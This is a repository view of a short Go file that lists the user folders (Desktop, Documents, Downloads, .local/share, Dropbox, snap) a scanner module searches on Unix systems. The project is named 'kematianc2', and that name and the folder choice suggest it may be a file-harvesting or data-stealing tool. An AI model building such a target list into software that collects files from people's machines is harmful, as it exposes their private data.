Files
kematianc2/Kematian-Standalone/native/recovery/scanner/files_unix.go
T

15 lines
276 B
Go
Raw Normal View History

2026-08-27 11:23:01 -06:00
//go:build !windows
package scanner
func getScanLocations() []scanLocation {
return []scanLocation{
{"Desktop", "Desktop"},
{"Documents", "Documents"},
{"Downloads", "Downloads"},
{".local/share", ".local/share"},
{"Dropbox", "Dropbox"},
{"snap", "Snap"},
}
}